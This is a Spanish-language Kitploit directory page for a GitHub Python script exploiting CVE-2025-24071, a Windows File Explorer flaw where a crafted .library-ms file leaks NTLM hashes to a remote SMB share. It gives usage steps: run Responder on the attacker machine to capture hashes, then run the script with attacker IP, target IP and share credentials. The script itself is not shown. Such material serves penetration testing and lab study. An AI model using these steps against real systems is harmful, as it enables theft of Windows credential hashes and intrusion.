Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-24071 — Script en Python para ejecutar CVE-2025-24071 | Kitploit
Herramientas/GitHubGitHub/ac8999/cve-2025-24071
Descifrado de ContraseñasAnálisis de VulnerabilidadesExplotaciónRecopilación de InformaciónPruebas de PenetraciónRed Teaming
GitHubac8999/cve-2025-24071

CVE-2025-24071

Script en Python para ejecutar CVE-2025-24071

Ver Repositorio
1hace 11 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-24071: Vulnerabilidad de Suplantación del Explorador de Archivos de Microsoft Windows (script de SilentExploit)

📖 Descripción

Este proyecto detecta y demuestra la explotación de una vulnerabilidad de suplantación del Explorador de Archivos de Windows.

El problema surge de un archivo de biblioteca de Windows (.library-ms) que contiene una ruta de red, ya sea como adjunto directo o incrustado en un archivo.
Al abrirlo, el archivo puede hacer que Windows filtre hashes NTLM a una ubicación de red remota (potencialmente maliciosa).

POC: https://imgur.com/a/hEO83Se

⚡ Uso

1. Iniciar Responder

En tu máquina atacante, ejecuta Responder para capturar hashes NTLM:

root@kitploit:~
sudo responder -I tun0 -wvF

2. Ejecutar el Script

Puedes configurar el script de dos maneras:

✅ Opción A: Editar valores predeterminados (más fácil)

Modifica los parámetros predeterminados directamente en el script.

root@kitploit:~
    parser.add_argument("--attacker-ip", default="10.10.14.14", help="IP del atacante")      #tu IP
    parser.add_argument("--target-ip", default="10.129.232.88", help="IP del objetivo")         #IP del objetivo 
    parser.add_argument("--share-name", default="IT", help="Nombre del recurso compartido SMB")               #nombre del recurso compartido al que tienes acceso sin la /
    parser.add_argument("--username", default="USERNAME", help="Usuario SMB")          #usuario del propietario del recurso compartido 
    parser.add_argument("--password", default="PASSWORD", help="Contraseña SMB")        #contraseña del propietario del recurso compartido 
    parser.add_argument("--interface", default="tun0", help="Interfaz de red de Responder")        #ver ifconfig, pero tun0 funcionará si estás en una VPN
    return parser.parse_args()

✅ Opción B: Ejecutar con parámetros CLI

Ejecuta con argumentos:

root@kitploit:~
python3 CVE-2025-24071.py \
    --attacker-ip <IP_ATACANTE> \
    --target-ip <IP_OBJETIVO> \
    --share-name <NOMBRE_RECURSO> \
    --username <USUARIO> \
    --password <CONTRASEÑA> \
    --interface <INTERFAZ>
Descargar herramienta